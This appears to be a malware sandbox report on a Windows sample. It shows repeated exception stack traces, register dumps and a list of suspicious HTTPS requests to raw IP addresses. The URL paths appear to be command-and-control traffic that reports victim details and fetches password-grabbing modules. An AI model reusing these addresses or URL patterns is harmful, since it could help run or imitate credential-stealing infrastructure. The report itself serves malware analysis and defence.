KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x76fd1278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x76f99a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x768cb5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744005bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74416d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x76fd1278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x76f99a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x768cb5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744005bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74416d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x76fd1278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x76f99a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x768cb5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744005bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74416d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x76fd1278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x76f99a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x768cb5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744005bd hook_in_monitor+0x45 lde-0x133 @ 0x743f42ea New_ntdll_NtAllocateVirtualMemory+0x34 New_ntdll_NtClose-0x162 @ 0x7440fc86 VirtualAllocExNuma+0x66 VirtualAllocEx-0x2a kernelbase+0x33096 @ 0x7fefd503096 VirtualAllocEx+0x16 WriteProcessMemory-0x1a kernelbase+0x330d6 @ 0x7fefd5030d6 VirtualAllocEx+0x11 VerLanguageNameW-0xf kernel32+0x4bbe1 @ 0x768cbbe1 0x9b27d exception.instruction_r: 48 8b 01 4a 89 44 c6 78 4d 85 e4 74 08 4b 89 8c exception.symbol: RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a exception.instruction: mov rax, qword ptr [rcx] exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 105050 exception.address: 0x76f99a5a registers.r14: 853685904 registers.r15: 853882576 registers.rcx: 27 registers.rsi: 3 registers.r10: 0 registers.rbx: 2 registers.rsp: 2741144 registers.r11: -125 registers.r8: 3 registers.r9: 1951001344 registers.rdx: 3 registers.r12: 40 registers.rbp: 3 registers.rdi: 2741536 registers.rax: 4 registers.r13: 0	1
__exception__ Aug. 5, 2021, 9:35 a.m.	stacktrace: RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x76f99a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x768cb5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744005bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74416d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x76fd1278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x76f99a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x768cb5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744005bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74416d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x76fd1278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x76f99a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x768cb5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744005bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74416d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x76fd1278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x76f99a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x768cb5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744005bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74416d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x76fd1278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x76f99a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x768cb5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744005bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74416d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x76fd1278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x76f99a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x768cb5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744005bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74416d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x76fd1278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x76f99a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x768cb5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744005bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74416d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x76fd1278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x76f99a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x768cb5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744005bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74416d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x76fd1278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x76f99a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x768cb5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744005bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74416d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x76fd1278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x76f99a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x768cb5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744005bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74416d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x76fd1278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x76f99a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x768cb5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744005bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74416d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x76fd1278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x76f99a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x768cb5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744005bd hook_in_monitor+0x45 lde-0x133 @ 0x743f42ea New_ntdll_NtAllocateVirtualMemory+0x34 New_ntdll_NtClose-0x162 @ 0x7440fc86 VirtualAllocExNuma+0x66 VirtualAllocEx-0x2a kernelbase+0x33096 @ 0x7fefd503096 VirtualAllocEx+0x16 WriteProcessMemory-0x1a kernelbase+0x330d6 @ 0x7fefd5030d6 VirtualAllocEx+0x11 VerLanguageNameW-0xf kernel32+0x4bbe1 @ 0x768cbbe1 0x9b27d exception.instruction_r: 48 8b 01 4a 89 44 c6 78 4d 85 e4 74 08 4b 89 8c exception.symbol: RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a exception.instruction: mov rax, qword ptr [rcx] exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 105050 exception.address: 0x76f99a5a registers.r14: 853996240 registers.r15: 853882960 registers.rcx: 27 registers.rsi: 3 registers.r10: 0 registers.rbx: 2 registers.rsp: 2741144 registers.r11: -125 registers.r8: 3 registers.r9: 1951001344 registers.rdx: 3 registers.r12: 40 registers.rbp: 3 registers.rdi: 2741536 registers.rax: 4 registers.r13: 0	1
__exception__ Aug. 5, 2021, 9:35 a.m.	stacktrace: RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x76f99a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x768cb5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744005bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74416d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x76fd1278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x76f99a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x768cb5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744005bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74416d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x76fd1278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x76f99a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x768cb5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744005bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74416d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x76fd1278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x76f99a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x768cb5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744005bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74416d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x76fd1278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x76f99a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x768cb5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744005bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74416d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x76fd1278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x76f99a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x768cb5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744005bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74416d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x76fd1278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x76f99a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x768cb5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744005bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74416d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x76fd1278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x76f99a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x768cb5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744005bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74416d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x76fd1278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x76f99a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x768cb5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744005bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74416d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x76fd1278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x76f99a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x768cb5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744005bd hook_in_monitor+0x45 lde-0x133 @ 0x743f42ea New_kernel32_GetTickCount+0x19 New_kernel32_GetTimeZoneInformation-0x76 @ 0x7440c0bf webio+0x18e4 @ 0x7fef7f318e4 webio+0x9700 @ 0x7fef7f39700 webio+0x969e @ 0x7fef7f3969e WinHttpCreateUrl+0x2109 WinHttpSendRequest-0x11f winhttp+0x73b1 @ 0x7fef7fa73b1 WinHttpCreateUrl+0x200c WinHttpSendRequest-0x21c winhttp+0x72b4 @ 0x7fef7fa72b4 WinHttpCloseHandle-0x108f winhttp+0x1251 @ 0x7fef7fa1251 WinHttpCreateUrl+0x1f73 WinHttpSendRequest-0x2b5 winhttp+0x721b @ 0x7fef7fa721b WinHttpSetStatusCallback+0x408 WinHttpOpenRequest-0x500 winhttp+0x40f8 @ 0x7fef7fa40f8 WinHttpCloseHandle+0x128 WinHttpOpen-0x1020 winhttp+0x2408 @ 0x7fef7fa2408 0xa7cef 0x2b0000 0x29ddb0 0x29dccc 0x29e090 exception.instruction_r: 48 8b 01 4a 89 44 c6 78 4d 85 e4 74 08 4b 89 8c exception.symbol: RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a exception.instruction: mov rax, qword ptr [rcx] exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 105050 exception.address: 0x76f99a5a registers.r14: 0 registers.r15: 2745984 registers.rcx: 0 registers.rsi: 2743500 registers.r10: 0 registers.rbx: 2743728 registers.rsp: 2743096 registers.r11: 0 registers.r8: 5 registers.r9: 1950996480 registers.rdx: 2 registers.r12: 1988766576 registers.rbp: 0 registers.rdi: 853676840 registers.rax: 1 registers.r13: 650984	1
__exception__ Aug. 5, 2021, 9:35 a.m.	stacktrace: RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x76f99a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x768cb5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744005bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74416d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x76fd1278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x76f99a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x768cb5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744005bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74416d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x76fd1278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x76f99a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x768cb5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744005bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74416d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x76fd1278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x76f99a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x768cb5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744005bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74416d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x76fd1278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x76f99a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x768cb5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744005bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74416d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x76fd1278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x76f99a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x768cb5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744005bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74416d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x76fd1278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x76f99a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x768cb5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744005bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74416d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x76fd1278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x76f99a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x768cb5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744005bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74416d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x76fd1278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x76f99a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x768cb5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744005bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74416d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x76fd1278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x76f99a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x768cb5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744005bd hook_in_monitor+0x45 lde-0x133 @ 0x743f42ea New_kernel32_GetTickCount+0x19 New_kernel32_GetTimeZoneInformation-0x76 @ 0x7440c0bf webio+0x18e4 @ 0x7fef7f318e4 webio+0x9700 @ 0x7fef7f39700 webio+0x969e @ 0x7fef7f3969e WinHttpCreateUrl+0x2109 WinHttpSendRequest-0x11f winhttp+0x73b1 @ 0x7fef7fa73b1 WinHttpCreateUrl+0x200c WinHttpSendRequest-0x21c winhttp+0x72b4 @ 0x7fef7fa72b4 WinHttpCloseHandle-0x108f winhttp+0x1251 @ 0x7fef7fa1251 WinHttpCreateUrl+0x1f73 WinHttpSendRequest-0x2b5 winhttp+0x721b @ 0x7fef7fa721b WinHttpSetStatusCallback+0x408 WinHttpOpenRequest-0x500 winhttp+0x40f8 @ 0x7fef7fa40f8 WinHttpCloseHandle+0x128 WinHttpOpen-0x1020 winhttp+0x2408 @ 0x7fef7fa2408 0xa7cef 0x2b0000 0x29ddb0 0x29dccc 0x29e090 exception.instruction_r: 48 8b 01 4a 89 44 c6 78 4d 85 e4 74 08 4b 89 8c exception.symbol: RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a exception.instruction: mov rax, qword ptr [rcx] exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 105050 exception.address: 0x76f99a5a registers.r14: 0 registers.r15: 2745984 registers.rcx: 0 registers.rsi: 2743500 registers.r10: 0 registers.rbx: 2743728 registers.rsp: 2743096 registers.r11: 0 registers.r8: 5 registers.r9: 1950996480 registers.rdx: 2 registers.r12: 1988766576 registers.rbp: 0 registers.rdi: 853676840 registers.rax: 1 registers.r13: 650984	1

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (29 events)

suspicious_features	Connection to IP address	suspicious_request	GET https://179.189.229.254/rob120/TEST22-PC_W617601.F05D79F977FC6337D28BBA9BDB7DAFB2/5/file/
suspicious_features	Connection to IP address	suspicious_request	GET https://46.99.175.217/rob120/TEST22-PC_W617601.F05D79F977FC6337D28BBA9BDB7DAFB2/5/file/
suspicious_features	Connection to IP address	suspicious_request	GET https://46.99.175.217/rob120/TEST22-PC_W617601.F05D79F977FC6337D28BBA9BDB7DAFB2/0/Windows%207%20x64%20SP1/1107/175.208.134.150/727F639DF1E9560A2743CB69221BB85D3D1D1CBDEE638318DB0A9F2C35331CAD/5tIdKd9BQcw97tDkWQXFcV8GHmRSS/
suspicious_features	Connection to IP address	suspicious_request	GET https://46.99.175.217/rob120/TEST22-PC_W617601.F05D79F977FC6337D28BBA9BDB7DAFB2/14/exc/E:%200xc0000005%20A:%200x0000000076F99A5A/0/
suspicious_features	Connection to IP address	suspicious_request	GET https://46.99.175.217/rob120/TEST22-PC_W617601.F05D79F977FC6337D28BBA9BDB7DAFB2/14/user/test22/0/
suspicious_features	Connection to IP address	suspicious_request	GET https://46.99.175.217/rob120/TEST22-PC_W617601.F05D79F977FC6337D28BBA9BDB7DAFB2/14/path/C:%5CUsers%5Ctest22%5CAppData%5CRoaming%5Cwise-toolsPXDT3N%5Cpzggi8w3183a1077e104d07a84291d0d5dcc1dexl.grf/0/
suspicious_features	Connection to IP address	suspicious_request	GET https://46.99.175.217/rob120/TEST22-PC_W617601.F05D79F977FC6337D28BBA9BDB7DAFB2/14/NAT%20status/client%20is%20behind%20NAT/0/
suspicious_features	Connection to IP address	suspicious_request	GET https://105.27.205.34/rob120/TEST22-PC_W617601.F05D79F977FC6337D28BBA9BDB7DAFB2/5/pwgrabb64/
suspicious_features	Connection to IP address	suspicious_request	GET https://128.201.76.252/rob120/TEST22-PC_W617601.F05D79F977FC6337D28BBA9BDB7DAFB2/5/file/
suspicious_features	Connection to IP address	suspicious_request	GET https://128.201.76.252/rob120/TEST22-PC_W617601.F05D79F977FC6337D28BBA9BDB7DAFB2/0/Windows%207%20x64%20SP1/1107/175.208.134.150/727F639DF1E9560A2743CB69221BB85D3D1D1CBDEE638318DB0A9F2C35331CAD/etAeSjeTCe4jkQuDOjlUTHW/
suspicious_features	Connection to IP address	suspicious_request	GET https://128.201.76.252/rob120/TEST22-PC_W617601.F05D79F977FC6337D28BBA9BDB7DAFB2/14/exc/E:%200xc0000005%20A:%200x0000000076F99A5A/0/
suspicious_features	Connection to IP address	suspicious_request	GET https://128.201.76.252/rob120/TEST22-PC_W617601.F05D79F977FC6337D28BBA9BDB7DAFB2/14/user/test22/0/
suspicious_features	Connection to IP address	suspicious_request	GET https://128.201.76.252/rob120/TEST22-PC_W617601.F05D79F977FC6337D28BBA9BDB7DAFB2/14/NAT%20status/client%20is%20behind%20NAT/0/
suspicious_features	Connection to IP address	suspicious_request	GET https://128.201.76.252/rob120/TEST22-PC_W617601.F05D79F977FC6337D28BBA9BDB7DAFB2/10/62/OJLELJAKUDUGHFR/7/
suspicious_features	Connection to IP address	suspicious_request	GET https://105.27.205.34/rob120/TEST22-PC_W617601.F05D79F977FC6337D28BBA9BDB7DAFB2/5/pwgrabc64/
suspicious_features	Connection to IP address	suspicious_request	GET https://65.152.201.203/rob120/TEST22-PC_W617601.F05D79F977FC6337D28BBA9BDB7DAFB2/5/file/
suspicious_features	Connection to IP address	suspicious_request	GET https://65.152.201.203/rob120/TEST22-PC_W617601.F05D79F977FC6337D28BBA9BDB7DAFB2/0/Windows%207%20x64%20SP1/1107/175.208.134.150/727F639DF1E9560A2743CB69221BB85D3D1D1CBDEE638318DB0A9F2C35331CAD/DerGZwL4ua1lDPww283xhhhGVTl48hJ/
suspicious_features	Connection to IP address	suspicious_request	GET https://65.152.201.203/rob120/TEST22-PC_W617601.F05D79F977FC6337D28BBA9BDB7DAFB2/14/exc/E:%200xc0000005%20A:%200x0000000076F99A5A/0/
suspicious_features	Connection to IP address	suspicious_request	GET https://65.152.201.203/rob120/TEST22-PC_W617601.F05D79F977FC6337D28BBA9BDB7DAFB2/14/user/test22/0/
suspicious_features	Connection to IP address	suspicious_request	GET https://65.152.201.203/rob120/TEST22-PC_W617601.F05D79F977FC6337D28BBA9BDB7DAFB2/14/NAT%20status/client%20is%20behind%20NAT/0/
suspicious_features	Connection to IP address	suspicious_request	GET https://128.201.76.252/rob120/TEST22-PC_W617601.F05D79F977FC6337D28BBA9BDB7DAFB2/0/Windows%207%20x64%20SP1/1107/175.208.134.150/727F639DF1E9560A2743CB69221BB85D3D1D1CBDEE638318DB0A9F2C35331CAD/MDFwQcZzmEtnaC9hhuhJDWmvxuDF/
suspicious_features	Connection to IP address	suspicious_request	GET https://128.201.76.252/rob120/TEST22-PC_W617601.F05D79F977FC6337D28BBA9BDB7DAFB2/10/62/TFOWOHKHTBS/7/
suspicious_features	Connection to IP address	suspicious_request	GET https://128.201.76.252/rob120/TEST22-PC_W617601.F05D79F977FC6337D28BBA9BDB7DAFB2/10/62/KBIJKZGVIOLLRWL/7/
suspicious_features	Connection to IP address	suspicious_request	GET https://128.201.76.252/rob120/TEST22-PC_W617601.F05D79F977FC6337D28BBA9BDB7DAFB2/23/100019/
suspicious_features	Connection to IP address	suspicious_request	GET https://128.201.76.252/rob120/TEST22-PC_W617601.F05D79F977FC6337D28BBA9BDB7DAFB2/14/DNSBL/listed/0/
suspicious_features	Connection to IP address	suspicious_request	GET https://184.74.99.214/rob120/TEST22-PC_W617601.F05D79F977FC6337D28BBA9BDB7DAFB2/5/file/
